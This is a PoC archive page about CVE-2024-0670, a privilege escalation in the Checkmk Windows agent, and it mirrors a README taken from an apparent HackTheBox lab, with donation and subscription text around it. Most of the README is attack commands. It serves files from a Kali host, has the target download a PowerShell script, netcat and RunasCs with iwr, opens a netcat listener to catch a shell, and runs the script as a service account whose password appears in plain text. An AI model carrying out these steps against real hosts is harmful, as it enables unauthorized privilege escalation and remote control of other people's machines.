Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-0670 PoC — Privilege escalation in windows agent

Source
https://github.com/zhulin837/checkmk_cve-2024-0670
Associated Vulnerability
Title:Privilege escalation in windows agent (CVE-2024-0670)
Description:Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges
Readme
# checkmk_cve-2024-0670
┌──(root㉿kali)-[/HTB/NanoCorp]

└─# python3 -m http.server 80
                                                                                            
PS C:\windows\temp> iwr http://10.10.16.10/zh.ps1 -outfile "c:\windows\temp\zh.ps1"

PS C:\windows\temp> iwr http://10.10.16.10/nc64.exe -outfile "c:\windows\temp\nc64.exe"

PS C:\windows\temp> iwr http://10.10.16.10/RunasCs.exe -outfile "c:\windows\temp\RunasCs.exe"

┌──(root㉿kali)-[/HTB/NanoCorp]

└─# rlwrap -cAr nc -lvnp 8888

PS C:\windows\temp> .\RunasCs.exe web_svc "dksehdgh712!@#" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File 
C:\Windows\Temp\zh.ps1"
File Snapshot

 [4.0K]  /data/pocs/eea9e80ab6144b38182ce5db74bf3b43f574ebeb
├── [ 719]  README.md
└── [2.4K]  zh.ps1

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →